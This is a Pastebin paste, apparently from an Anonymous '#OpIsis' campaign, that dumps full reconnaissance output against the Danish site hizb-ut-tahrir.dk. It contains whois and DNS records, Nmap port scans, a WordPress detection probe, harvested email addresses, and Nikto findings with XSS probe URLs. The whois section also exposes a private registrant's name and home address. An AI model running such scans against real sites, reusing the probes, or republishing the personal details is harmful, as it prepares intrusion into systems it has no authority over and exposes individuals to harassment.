Advertisement
Guest User

Anonymous JTSEC #OpIsis Full Recon #7

a guest
Jan 30th, 2019
1,754
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 128.08 KB | None | 0 0
  1. #######################################################################################################################################
  2. =======================================================================================================================================
  3. Hostname hizb-ut-tahrir.dk ISP Zitcom A/S
  4. Continent Europe Flag
  5. DK
  6. Country Denmark Country Code DK
  7. Region Unknown Local time 30 Jan 2019 01:39 CET
  8. City Unknown Postal Code Unknown
  9. IP Address 93.191.156.145 Latitude 55.712
  10. Longitude 12.056
  11. =======================================================================================================================================
  12. #######################################################################################################################################
  13. > hizb-ut-tahrir.dk
  14. Server: 27.50.70.139
  15. Address: 27.50.70.139#53
  16.  
  17. Non-authoritative answer:
  18. Name: hizb-ut-tahrir.dk
  19. Address: 93.191.156.145
  20. >
  21. #######################################################################################################################################
  22. HostIP:93.191.156.145
  23. HostName:hizb-ut-tahrir.dk
  24.  
  25. Gathered Inet-whois information for 93.191.156.145
  26. ---------------------------------------------------------------------------------------------------------------------------------------
  27.  
  28.  
  29. inetnum: 93.191.156.0 - 93.191.156.255
  30. netname: ACL-2342
  31. descr: ZITCOM A/S
  32. country: DK
  33. org: ORG-ZA59-RIPE
  34. admin-c: ZIN4-RIPE
  35. tech-c: ZIN4-RIPE
  36. status: ASSIGNED PA
  37. mnt-by: ZITCOM-MNT
  38. created: 2018-01-03T12:40:00Z
  39. last-modified: 2018-01-03T12:41:38Z
  40. source: RIPE # Filtered
  41.  
  42. organisation: ORG-ZA59-RIPE
  43. org-name: Zitcom A/S
  44. org-type: LIR
  45. address: H�jvangen 4
  46. address: 8660
  47. address: Skanderborg
  48. address: DENMARK
  49. phone: +4570235566
  50. fax-no: +4570235567
  51. admin-c: FBH16-RIPE
  52. admin-c: MHV24-RIPE
  53. admin-c: AS48854-RIPE
  54. abuse-c: ZIN4-RIPE
  55. mnt-ref: RIPE-NCC-HM-MNT
  56. mnt-ref: ZITCOM-MNT
  57. mnt-by: RIPE-NCC-HM-MNT
  58. mnt-by: ZITCOM-MNT
  59. created: 2010-08-27T09:23:04Z
  60. last-modified: 2017-09-06T16:36:03Z
  61. source: RIPE # Filtered
  62.  
  63. role: Zitcom IP Network
  64. address: H�jvangen 4
  65. address: Skanderborg 8660
  66. address: Denmark
  67. phone: +45 70235566
  68. remarks: *********************************************
  69. remarks: Do NOT send abuse reports to any other
  70. remarks: address EXCEPT abuse@zitcom.dk
  71. remarks: **********************************************
  72. remarks: Network Operation Center +45 70 23 55 66
  73. remarks: Routing issue <noc@zitcom.dk>
  74. admin-c: MHV24-RIPE
  75. admin-c: FBH16-RIPE
  76. admin-c: AS48854-RIPE
  77. tech-c: MHV24-RIPE
  78. tech-c: FBH16-RIPE
  79. tech-c: AS48854-RIPE
  80. nic-hdl: ZIN4-RIPE
  81. mnt-by: ZITCOM-MNT
  82. created: 2010-08-31T10:44:11Z
  83. last-modified: 2018-04-10T20:14:16Z
  84. source: RIPE # Filtered
  85. abuse-mailbox: abuse@zitcom.dk
  86.  
  87. % Information related to '93.191.156.0/24AS48854'
  88.  
  89. route: 93.191.156.0/24
  90. descr: ZITCOM A/S
  91. origin: AS48854
  92. mnt-by: zitcom-mnt
  93. created: 2015-04-08T12:49:58Z
  94. last-modified: 2015-04-08T12:49:58Z
  95. source: RIPE
  96.  
  97. % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
  98.  
  99.  
  100.  
  101. Gathered Inic-whois information for hizb-ut-tahrir.dk
  102. ---------------------------------------------------------------------------------------------------------------------------------------
  103. Domain: hizb-ut-tahrir.dk
  104. DNS: hizb-ut-tahrir.dk
  105. Registered: 1999-08-05
  106. Expires: 2019-09-30
  107. Registration period: 1 year
  108. VID: no
  109. Dnssec: Unsigned delegation
  110. Status: Active
  111.  
  112. Nameservers
  113. Hostname: ns1.unoeuro.com
  114. Hostname: ns2.unoeuro.com
  115. Hostname: ns3.unoeuro.com
  116. Hostname: ns4.unoeuro.com
  117.  
  118. # Use option --show-handles to get handle information.
  119. # Whois HELP for more help.
  120.  
  121. Gathered Netcraft information for hizb-ut-tahrir.dk
  122. ---------------------------------------------------------------------------------------------------------------------------------------
  123.  
  124. Retrieving Netcraft.com information for hizb-ut-tahrir.dk
  125. Netcraft.com Information gathered
  126.  
  127. Gathered Subdomain information for hizb-ut-tahrir.dk
  128. ---------------------------------------------------------------------------------------------------------------------------------------
  129. Searching Google.com:80...
  130. HostName:www.hizb-ut-tahrir.dk
  131. HostIP:93.191.156.145
  132. Searching Altavista.com:80...
  133. Found 1 possible subdomain(s) for host hizb-ut-tahrir.dk, Searched 0 pages containing 0 results
  134.  
  135. Gathered E-Mail information for hizb-ut-tahrir.dk
  136. ---------------------------------
  137. Searching Google.com:80...
  138. Searching Altavista.com:80...
  139. Found 0 E-Mail(s) for host hizb-ut-tahrir.dk, Searched 0 pages containing 0 results
  140.  
  141. Gathered TCP Port information for 93.191.156.145
  142. ---------------------------------------------------------------------------------------------------------------------------------------
  143.  
  144. Port State
  145.  
  146. 21/tcp open
  147. 22/tcp open
  148. 80/tcp open
  149.  
  150. Portscan Finished: Scanned 150 ports, 3 ports were in state closed
  151. #######################################################################################################################################
  152. [i] Scanning Site: http://hizb-ut-tahrir.dk
  153.  
  154.  
  155.  
  156. B A S I C I N F O
  157. =======================================================================================================================================
  158.  
  159.  
  160. [+] Site Title:
  161. [+] IP address: 93.191.156.145
  162. [+] Web Server: Could Not Detect
  163. [+] CMS: Could Not Detect
  164. [+] Cloudflare: Not Detected
  165. [+] Robots File: Could NOT Find robots.txt!
  166.  
  167.  
  168.  
  169.  
  170. W H O I S L O O K U P
  171. =======================================================================================================================================
  172.  
  173. # Hello 2600:3c03::f03c:91ff:fe7a:dffa. Your session has been logged.
  174. #
  175. # Copyright (c) 2002 - 2019 by DK Hostmaster A/S
  176. #
  177. # Version: 2.0.2
  178. #
  179. # The data in the DK Whois database is provided by DK Hostmaster A/S
  180. # for information purposes only, and to assist persons in obtaining
  181. # information about or related to a domain name registration record.
  182. # We do not guarantee its accuracy. We will reserve the right to remove
  183. # access for entities abusing the data, without notice.
  184. #
  185. # Any use of this material to target advertising or similar activities
  186. # are explicitly forbidden and will be prosecuted. DK Hostmaster A/S
  187. # requests to be notified of any such activities or suspicions thereof.
  188.  
  189. Domain: hizb-ut-tahrir.dk
  190. DNS: hizb-ut-tahrir.dk
  191. Registered: 1999-08-05
  192. Expires: 2019-09-30
  193. Registration period: 1 year
  194. VID: no
  195. Dnssec: Unsigned delegation
  196. Status: Active
  197.  
  198. Registrant
  199. Handle: MJ7736-DK
  200. Name: Mulie Langberg Jaw
  201. Address: Tømrergade 6,1 tv
  202. Postalcode: 2200
  203. City: København N
  204. Country: DK
  205.  
  206. Administrator
  207. Handle: MJ7736-DK
  208. Name: Mulie Langberg Jaw
  209. Address: Tømrergade 6,1 tv
  210. Postalcode: 2200
  211. City: København N
  212. Country: DK
  213.  
  214. Nameservers
  215. Hostname: ns1.unoeuro.com
  216. Handle: UA1074-DK
  217. Hostname: ns2.unoeuro.com
  218. Handle: UA1074-DK
  219. Hostname: ns3.unoeuro.com
  220. Handle: UA1074-DK
  221. Hostname: ns4.unoeuro.com
  222. Handle: UA1074-DK
  223.  
  224.  
  225.  
  226.  
  227.  
  228. G E O I P L O O K U P
  229. =======================================================================================================================================
  230.  
  231. [i] IP Address: 93.191.156.145
  232. [i] Country: Denmark
  233. [i] State:
  234. [i] City:
  235. [i] Latitude: 55.7123
  236. [i] Longitude: 12.0564
  237.  
  238.  
  239.  
  240.  
  241. H T T P H E A D E R S
  242. =======================================================================================================================================
  243.  
  244.  
  245. [i] HTTP/1.1 406 Not Acceptable
  246. [i] Date: Wed, 30 Jan 2019 01:00:29 GMT
  247. [i] Content-Length: 102
  248. [i] Content-Type: text/html; charset=iso-8859-1
  249. [i] Connection: close
  250.  
  251.  
  252.  
  253.  
  254. D N S L O O K U P
  255. =======================================================================================================================================
  256.  
  257. hizb-ut-tahrir.dk. 3599 IN A 93.191.156.145
  258. hizb-ut-tahrir.dk. 3599 IN NS ns1.unoeuro.com.
  259. hizb-ut-tahrir.dk. 3599 IN NS ns2.unoeuro.com.
  260. hizb-ut-tahrir.dk. 3599 IN NS ns3.unoeuro.com.
  261. hizb-ut-tahrir.dk. 3599 IN NS ns4.unoeuro.com.
  262. hizb-ut-tahrir.dk. 14399 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2018102500 14400 3600 1209600 3600
  263. hizb-ut-tahrir.dk. 3599 IN MX 10 mx.unoeuro.com.
  264. hizb-ut-tahrir.dk. 3599 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
  265.  
  266.  
  267.  
  268.  
  269. S U B N E T C A L C U L A T I O N
  270. =======================================================================================================================================
  271.  
  272. Address = 93.191.156.145
  273. Network = 93.191.156.145 / 32
  274. Netmask = 255.255.255.255
  275. Broadcast = not needed on Point-to-Point links
  276. Wildcard Mask = 0.0.0.0
  277. Hosts Bits = 0
  278. Max. Hosts = 1 (2^0 - 0)
  279. Host Range = { 93.191.156.145 - 93.191.156.145 }
  280.  
  281.  
  282.  
  283. N M A P P O R T S C A N
  284. =======================================================================================================================================
  285.  
  286.  
  287. Starting Nmap 7.40 ( https://nmap.org ) at 2019-01-30 01:00 UTC
  288. Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
  289. Host is up (0.10s latency).
  290. rDNS record for 93.191.156.145: linux260.unoeuro.com
  291. PORT STATE SERVICE
  292. 21/tcp open ftp
  293. 22/tcp open ssh
  294. 23/tcp filtered telnet
  295. 80/tcp open http
  296. 110/tcp filtered pop3
  297. 143/tcp filtered imap
  298. 443/tcp open https
  299. 3389/tcp filtered ms-wbt-server
  300.  
  301. Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
  302. #######################################################################################################################################
  303. [?] Enter the target: example( http://domain.com )
  304. http://hizb-ut-tahrir.dk/
  305. [!] IP Address : 93.191.156.145
  306. [!] CMS Detected : WordPress
  307. [?] Would you like to use WPScan? [Y/n] Y
  308. Scan Aborted: invalid option: --random-agent
  309. [+] Honeypot Probabilty: 0%
  310. ---------------------------------------------------------------------------------------------------------------------------------------
  311. [~] Trying to gather whois information for hizb-ut-tahrir.dk
  312. [+] Whois information found
  313. [-] Unable to build response, visit https://who.is/whois/hizb-ut-tahrir.dk
  314. ---------------------------------------------------------------------------------------------------------------------------------------
  315. PORT STATE SERVICE
  316. 21/tcp open ftp
  317. 22/tcp open ssh
  318. 23/tcp filtered telnet
  319. 80/tcp open http
  320. 110/tcp filtered pop3
  321. 143/tcp filtered imap
  322. 443/tcp open https
  323. 3389/tcp filtered ms-wbt-server
  324. Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds
  325. ---------------------------------------------------------------------------------------------------------------------------------------
  326.  
  327. [+] DNS Records
  328. ns2.unoeuro.com. (93.191.156.2) AS48854 Zitcom A/S Denmark
  329. ns3.unoeuro.com. (83.217.78.186) AS34762 Sentia N.V. Belgium
  330. ns1.unoeuro.com. (46.36.215.2) AS207199 Zitcom A/S Denmark
  331. ns4.unoeuro.com. (85.159.211.233) AS63949 Linode, LLC United Kingdom
  332.  
  333. [+] MX Records
  334. 10 (94.231.103.108) AS48854 Zitcom A/S Denmark
  335.  
  336. [+] Host Records (A)
  337. www.hizb-ut-tahrir.dk (linux260.unoeuro.com) (93.191.156.145) AS48854 Zitcom A/S Denmark
  338.  
  339. [+] TXT Records
  340. "v=spf1 include:spf.unoeuro.com ?all"
  341.  
  342. [+] DNS Map: https://dnsdumpster.com/static/map/hizb-ut-tahrir.dk.png
  343.  
  344. [>] Initiating 3 intel modules
  345. [>] Loading Alpha module (1/3)
  346. [>] Beta module deployed (2/3)
  347. [>] Gamma module initiated (3/3)
  348.  
  349.  
  350. [+] Emails found:
  351. ---------------------------------------------------------------------------------------------------------------------------------------
  352. info@hizb-ut-tahrir.dk
  353. pixel-1548810051664078-web-@hizb-ut-tahrir.dk
  354. pixel-1548810054527870-web-@hizb-ut-tahrir.dk
  355.  
  356. [+] Hosts found in search engines:
  357. ---------------------------------------------------------------------------------------------------------------------------------------
  358. [-] Resolving hostnames IPs...
  359. 93.191.156.145:292301-www.hizb-ut-tahrir.dk
  360. 93.191.156.145:2F292301-www.hizb-ut-tahrir.dk
  361. 93.191.156.145:www.hizb-ut-tahrir.dk
  362. [+] Virtual hosts:
  363. ---------------------------------------------------------------------------------------------------------------------------------------
  364. #######################################################################################################################################
  365. ; <<>> DiG 9.11.5-P1-1-Debian <<>> hizb-ut-tahrir.dk
  366. ;; global options: +cmd
  367. ;; Got answer:
  368. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39158
  369. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  370.  
  371. ;; OPT PSEUDOSECTION:
  372. ; EDNS: version: 0, flags:; udp: 4096
  373. ;; QUESTION SECTION:
  374. ;hizb-ut-tahrir.dk. IN A
  375.  
  376. ;; ANSWER SECTION:
  377. hizb-ut-tahrir.dk. 1396 IN A 93.191.156.145
  378.  
  379. ;; Query time: 359 msec
  380. ;; SERVER: 27.50.70.139#53(27.50.70.139)
  381. ;; WHEN: mar jan 29 21:16:56 EST 2019
  382. ;; MSG SIZE rcvd: 62
  383. #######################################################################################################################################
  384. ; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace hizb-ut-tahrir.dk
  385. ;; global options: +cmd
  386. . 80445 IN NS c.root-servers.net.
  387. . 80445 IN NS d.root-servers.net.
  388. . 80445 IN NS h.root-servers.net.
  389. . 80445 IN NS k.root-servers.net.
  390. . 80445 IN NS e.root-servers.net.
  391. . 80445 IN NS g.root-servers.net.
  392. . 80445 IN NS l.root-servers.net.
  393. . 80445 IN NS m.root-servers.net.
  394. . 80445 IN NS j.root-servers.net.
  395. . 80445 IN NS i.root-servers.net.
  396. . 80445 IN NS f.root-servers.net.
  397. . 80445 IN NS b.root-servers.net.
  398. . 80445 IN NS a.root-servers.net.
  399. . 80445 IN RRSIG NS 8 0 518400 20190211170000 20190129160000 16749 . pDvhof1Qq3BIPv/R7RZEVOcqXxufNPRLMC7w622YEMv/8yOaSm50jfFe dLM4Ay8eP+/6RcvyjJOVlS61syQtNVP5ErTTsc2oyBp9bNZNBhPk0OBs 6cDzTYewhJj/ckNL0V7VDboUjr4wd/FsB5RK4ZGIRr44CxjL6FdJ7iaD A360PZonDi7oI0g77VOiDYzPB5tS4T9N3dQWtxndFc5++yVH9gnINRyZ s2Mw83DMyJDgZh25RS5W6Ev/Oo1EsSYUFdG3elX0/1NPVauecOna4pQ0 mThOMX2ZS1MCdCCjq/cRn6pKaJHr8Jibz0ks++b3EHQH1kwQN0dL8eAL b2OL5g==
  400. ;; Received 525 bytes from 27.50.70.139#53(27.50.70.139) in 355 ms
  401.  
  402. dk. 172800 IN NS a.nic.dk.
  403. dk. 172800 IN NS b.nic.dk.
  404. dk. 172800 IN NS c.nic.dk.
  405. dk. 172800 IN NS l.nic.dk.
  406. dk. 172800 IN NS p.nic.dk.
  407. dk. 172800 IN NS s.nic.dk.
  408. dk. 86400 IN DS 32195 8 2 167CB3652048F478222E958D1CAD907D7ECB28E7A545DE01B8591AD2 9EAC6444
  409. dk. 86400 IN RRSIG DS 8 1 86400 20190211170000 20190129160000 16749 . ZTRSe/z0A926yKpZYtD5F2RuCKdv04x6ZloZWUOoIJ2u3xL1QGQvdye4 +nYkfqcthJ41Q/uXqvM9WfldbkgUXa9ZlBAsO2jpH7nuOCPm5akDLMyg wZz7iyyZJha907llxIyQe5Sd9BhkpfLWCLjxcqfssQcZ8EgL02vxGxLg 9ieOzDOIpUKvfEDvUgcPyZPOznYSzBV/Zd3T+SXmShgBEULJ4LpcgpzP eD6HS0gLM7W1743dYlPR5ktAi329RxlaoMmXeQQTBdY3ql673bcBEsC4 7ila+Y6K6eSMTmzXxkmivNeexK9YdPV+lrUomF1zA7297q4uqtpQJ6Ib QuJo3A==
  410. ;; Received 717 bytes from 192.5.5.241#53(f.root-servers.net) in 248 ms
  411.  
  412. hizb-ut-tahrir.dk. 86400 IN NS ns1.unoeuro.com.
  413. hizb-ut-tahrir.dk. 86400 IN NS ns2.unoeuro.com.
  414. hizb-ut-tahrir.dk. 86400 IN NS ns3.unoeuro.com.
  415. hizb-ut-tahrir.dk. 86400 IN NS ns4.unoeuro.com.
  416. sr833b94sidck8s7te0nq20kd92bcg8p.dk. 600 IN NSEC3 1 1 17 9729B7160513B7A5 SR8A4TO3M6BPJFFK74AV469LME7QNMLP A NS SOA TXT AAAA RRSIG DNSKEY NSEC3PARAM
  417. tg1l0h4nsv1es9neq8b2b203vbrnvh3b.dk. 600 IN NSEC3 1 1 17 9729B7160513B7A5 TG28TN2Q0JTLDOMKDHB6A46M44RN48ON NS DS RRSIG
  418. sr833b94sidck8s7te0nq20kd92bcg8p.dk. 600 IN RRSIG NSEC3 8 2 600 20190226151018 20190129120344 57799 dk. iJ4uCFpFfv5RbkUVYHhRfHMn7YNH1KVqq6XMBc0z8SIgMhi3EPqHPqHK S8uvq+qzZeiN0rNxzondcwY0L5w2MFuOjBB6FpqjKbPJ9ns7Pj6dUHDT ICOtje/IhW44L4Fe6qSr2wmIYYuHNM7t5SDlKMKLw+Qs6GvTiGePgoI0 36/+h8IIJOQMfRzj+6GXk2TriCXFBslsUY5bnSIwiLJ82At77gQPMAwj JHKuLwDCLB93cqLci3nZqTQYBMfaJDoXYAfzgZLZ7BnINyj/5X8bzEnf pX7jM/MuxMzuC7nBHjklkSAONR/59pNIVCHAB8j/2a0AtSUt/cFggpbG LoC7fg==
  419. tg1l0h4nsv1es9neq8b2b203vbrnvh3b.dk. 600 IN RRSIG NSEC3 8 2 600 20190227052610 20190129220350 57799 dk. dXFZR7wFVuof2YlhmHP3K1D74a/tOjGXdZaLPkEn0StzTZdznaEPfrD7 L/irVfLwyuhGpIRH6ZuJX1QuYOz6TGPpR5Ka8aFQfefm5fp0Ag3met6f YKV9ODzoQmBmQxdG5eWNoGfssHsCk/G+foocuNHz2zVOEjQZpryujS6B DZNdPQ6Z4JjVmFwZsjBAp6qQEy/g1FivHooZOFWEb+rmLB2/BWrCJVz/ nDHhp5ApcfW4PyZanFsznRCEmsnceCArQJQMSaNA0vYWAtRkAyvzNjwP V5sy9Wg2loYZzZKs2Mt7AItzOfs3HJuQXB9Dnj6+iRQj8JAUQFtX68Sn 7IVPIg==
  420. ;; Received 884 bytes from 2001:678:74::53#53(c.nic.dk) in 39 ms
  421.  
  422. hizb-ut-tahrir.dk. 3600 IN A 93.191.156.145
  423. ;; Received 62 bytes from 46.36.215.2#53(ns1.unoeuro.com) in 496 ms
  424. #######################################################################################################################################
  425. Traceroute 'hizb-ut-tahrir.dk '
  426. ---------------------------------------------------------------------------------------------------------------------------------------
  427.  
  428. Start: 2019-01-30T02:19:03+0000
  429. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  430. 1.|-- 45.79.12.201 0.0% 3 0.8 0.8 0.6 1.2 0.3
  431. 2.|-- 45.79.12.4 0.0% 3 1.0 0.8 0.5 1.0 0.3
  432. 3.|-- 45.79.12.8 0.0% 3 0.7 2.7 0.7 6.8 3.5
  433. 4.|-- ix-et-5-1-2-0.tcore1.dt8-dallas.as6453.net 0.0% 3 1.9 1.7 1.2 1.9 0.4
  434. 5.|-- if-ae-37-3.tcore1.aeq-ashburn.as6453.net 0.0% 3 122.8 122.6 121.9 123.2 0.6
  435. 6.|-- if-ae-2-2.tcore2.aeq-ashburn.as6453.net 0.0% 3 121.6 121.9 121.6 122.2 0.3
  436. 7.|-- if-ae-12-2.tcore4.njy-newark.as6453.net 0.0% 3 121.8 122.2 121.8 122.4 0.3
  437. 8.|-- if-ae-1-3.tcore3.njy-newark.as6453.net 0.0% 3 121.7 122.0 121.6 122.8 0.6
  438. 9.|-- if-ae-15-2.tcore1.l78-london.as6453.net 0.0% 3 122.0 121.8 121.6 122.0 0.2
  439. 10.|-- if-ae-3-2.tcore1.pye-paris.as6453.net 0.0% 3 122.1 127.1 122.1 130.8 4.5
  440. 11.|-- if-ae-11-2.tcore1.pvu-paris.as6453.net 0.0% 3 121.7 121.9 121.6 122.3 0.4
  441. 12.|-- if-ae-9-3.tcore2.fnm-frankfurt.as6453.net 0.0% 3 120.9 122.5 120.9 124.0 1.5
  442. 13.|-- 195.219.87.25 0.0% 3 125.4 125.0 124.5 125.4 0.5
  443. 14.|-- ae1-0.sdnqe10.dk.ip.tdc.net 0.0% 3 137.8 138.2 137.8 138.7 0.5
  444. 15.|-- cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net 0.0% 3 133.0 133.4 132.4 134.7 1.2
  445. 16.|-- 212.237.248.7 0.0% 3 137.0 137.6 137.0 138.9 1.1
  446. 17.|-- vdom1.net.dk2.zitcom.dk 0.0% 3 139.3 136.4 130.5 139.4 5.1
  447. 18.|-- linux260.unoeuro.com 0.0% 3 140.1 140.1 139.8 140.5 0.4
  448. #######################################################################################################################################
  449. [*] Performing General Enumeration of Domain: hizb-ut-tahrir.dk
  450. [!] Wildcard resolution is enabled on this domain
  451. [!] It is resolving to 93.191.156.145
  452. [!] All queries will resolve to this address!!
  453. [-] DNSSEC is not configured for hizb-ut-tahrir.dk
  454. [*] SOA ns1.unoeuro.com 46.36.215.2
  455. [*] NS ns4.unoeuro.com 85.159.211.233
  456. [*] NS ns4.unoeuro.com 2a01:7e00::f03c:91ff:fe50:2326
  457. [*] NS ns2.unoeuro.com 93.191.156.2
  458. [*] NS ns3.unoeuro.com 83.217.78.186
  459. [*] NS ns3.unoeuro.com 2a00:1c98:10:26::10
  460. [*] NS ns1.unoeuro.com 46.36.215.2
  461. [*] MX mx.unoeuro.com 94.231.103.108
  462. [*] A hizb-ut-tahrir.dk 93.191.156.145
  463. [*] TXT hizb-ut-tahrir.dk v=spf1 include:spf.unoeuro.com ?all
  464. [*] Enumerating SRV Records
  465. [*] SRV _autodiscover._tcp.hizb-ut-tahrir.dk maildiscover.unoeuro.com 94.231.108.222 443 10
  466. [+] 1 Records Found
  467. ######################################################################################################################################
  468. [*] Processing domain hizb-ut-tahrir.dk
  469. [*] Using system resolvers ['27.50.70.139', '38.132.106.139', '185.93.180.131', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
  470. [+] Getting nameservers
  471. 85.159.211.233 - ns4.unoeuro.com
  472. 93.191.156.2 - ns2.unoeuro.com
  473. 83.217.78.186 - ns3.unoeuro.com
  474. 46.36.215.2 - ns1.unoeuro.com
  475. [-] Zone transfer failed
  476.  
  477. [+] TXT records found
  478. "v=spf1 include:spf.unoeuro.com ?all"
  479.  
  480. [+] MX records found, added to target list
  481. 10 mx.unoeuro.com.
  482.  
  483. [+] Wildcard domain found - 93.191.156.145
  484. [*] Scanning hizb-ut-tahrir.dk for A records
  485. 94.231.108.222 - autoconfig.hizb-ut-tahrir.dk
  486. 94.231.103.107 - mail.hizb-ut-tahrir.dk
  487. 94.231.106.220 - smtp.hizb-ut-tahrir.dk
  488. #######################################################################################################################################
  489. =======================================================================================================================================
  490. | External hosts:
  491. | [+] External Host Found: http://www.islamdevleti.org
  492. | [+] External Host Found: http://da.wikipedia.org
  493. | [+] External Host Found: http://www.globalpost.com
  494. | [+] External Host Found: http://hizb.dk
  495. | [+] External Host Found: http://www.guardian.co.uk
  496. | [+] External Host Found: http://archives.dawn.com
  497. | [+] External Host Found: http://verdenshandel.dk
  498. | [+] External Host Found: http://economictimes.indiatimes.com
  499. | [+] External Host Found: http://www.timesonline.co.uk
  500. | [+] External Host Found: http://www.180grader.dk
  501. | [+] External Host Found: http://www.ifu.dk
  502. | [+] External Host Found: http://www.npr.org
  503. | [+] External Host Found: http://www.berlingske.dk
  504. | [+] External Host Found: http://www.cdc.gov
  505. | [+] External Host Found: http://www.nytimes.com
  506. | [+] External Host Found: http://www.leksikon.org
  507. | [+] External Host Found: http://www.kristeligt-dagblad.dk
  508. | [+] External Host Found: http://www.dailystar.com.lb
  509. | [+] External Host Found: http://eepurl.com
  510. | [+] External Host Found: https://www.facebook.com
  511. | [+] External Host Found: http://www.scribd.com
  512. | [+] External Host Found: http://hizb-ut-tahrir.dk
  513. | [+] External Host Found: http://connect.facebook.net
  514. | [+] External Host Found: http://www.faktalink.dk
  515. | [+] External Host Found: http://www.stm.dk
  516. | [+] External Host Found: http://www.youtube.com
  517. | [+] External Host Found: http://edition.cnn.com
  518. | [+] External Host Found: http://blueimp.github.io
  519. | [+] External Host Found: http://www.b.dk
  520. | [+] External Host Found: http://Vwww.nordealivogpension.dk
  521. | [+] External Host Found: http://www.khilafah.com
  522. | [+] External Host Found: http://pak-news.net
  523. | [+] External Host Found: http://www.aerenlund.dk
  524. | [+] External Host Found: http://thomaswagnernielsen.dk
  525. | [+] External Host Found: http://www.dr.dk
  526. | [+] External Host Found: http://www.haaretz.com
  527. | [+] External Host Found: http://i.pol.dk
  528. | [+] External Host Found: http://news.bbc.co.uk
  529. | [+] External Host Found: http://code.jquery.com
  530. | [+] External Host Found: http://politiken.dk
  531. | [+] External Host Found: http://www.washingtonpost.com
  532. | [+] External Host Found: http://www.maannews.net
  533. | [+] External Host Found: http://www.spapev.org
  534. | [+] External Host Found: http://www.centreforsocialjustice.www.centreforsocialjustice.org.uk
  535. | [+] External Host Found: http://www.information.dk
  536. | [+] External Host Found: http://upload
  537. =======================================================================================================================================
  538. | E-mails:
  539. | [+] E-mail Found: women@hizb-ut-tahrir.info
  540. | [+] E-mail Found: info@hizb-ut-tahrir.dk
  541. | [+] E-mail Found: info@hizb-australia.org
  542. | [+] E-mail Found: chadi@hizb-ut-tahrir.dk
  543. | [+] E-mail Found: cf@hizb.dk
  544. =======================================================================================================================================
  545. #######################################################################################################################################
  546. Ip Address Status Type Domain Name Server
  547. ---------- ------ ---- ----------- ------
  548. 94.231.103.107 alias mail.hizb-ut-tahrir.dk
  549. 94.231.103.107 host mail.unoeuro.com
  550. 94.231.106.220 alias smtp.hizb-ut-tahrir.dk
  551. 94.231.106.220 host asmtp.unoeuro.com
  552. #######################################################################################################################################
  553. --------------------------------------------------------------------------------------------------------------------------------------
  554. + Target IP: 93.191.156.145
  555. + Target Hostname: 93.191.156.145
  556. + Target Port: 443
  557. ---------------------------------------------------------------------------------------------------------------------------------------
  558. + SSL Info: Subject: /C=DK/postalCode=8660/ST=Jutland/L=Skanderborg/street=Danmarksvej 26/O=UnoEuro Danmark A/S/OU=Hostmaster/OU=PremiumSSL Wildcard/CN=*.unoeuro.com
  559. Ciphers: TLS_AES_256_GCM_SHA384
  560. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Organization Validation Secure Server CA
  561. + Start Time: 2019-01-29 21:45:18 (GMT-5)
  562. ---------------------------------------------------------------------------------------------------------------------------------------
  563. + Server: Apache
  564. + The anti-clickjacking X-Frame-Options header is not present.
  565. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  566. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  567. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  568. + Root page / redirects to: http://93.191.156.145/
  569. + No CGI Directories found (use '-C all' to force check all possible dirs)
  570. + Server is using a wildcard certificate: *.unoeuro.com
  571. + Hostname '93.191.156.145' does not match certificate's names: *.unoeuro.com
  572. + 7537 requests: 0 error(s) and 6 item(s) reported on remote host
  573. + End Time: 2019-01-29 22:54:10 (GMT-5) (4132 seconds)
  574. ---------------------------------------------------------------------------------------------------------------------------------------
  575. #######################################################################################################################################
  576. --------------------------------------------------------------------------------------------------------------------------------------
  577. + Target IP: 93.191.156.145
  578. + Target Hostname: hizb-ut-tahrir.dk
  579. + Target Port: 80
  580. + Start Time: 2019-01-29 21:45:28 (GMT-5)
  581. ---------------------------------------------------------------------------------------------------------------------------------------
  582. + Server: No banner retrieved
  583. + Retrieved x-powered-by header: PHP/5.6.40
  584. + The anti-clickjacking X-Frame-Options header is not present.
  585. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  586. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  587. Illegal hexadecimal digit 'g' ignored at /var/lib/nikto/plugins/nikto_headers.plugin line 106.
  588. + Server leaks inodes via ETags, header found with file /robots.txt, inode: 263, size: 1443430126000000, mtime: Wed Dec 31 19:00:00 1969
  589. + "robots.txt" contains 7 entries which should be manually viewed.
  590. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
  591. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  592. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  593. + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  594. + OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
  595. + OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  596. + /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
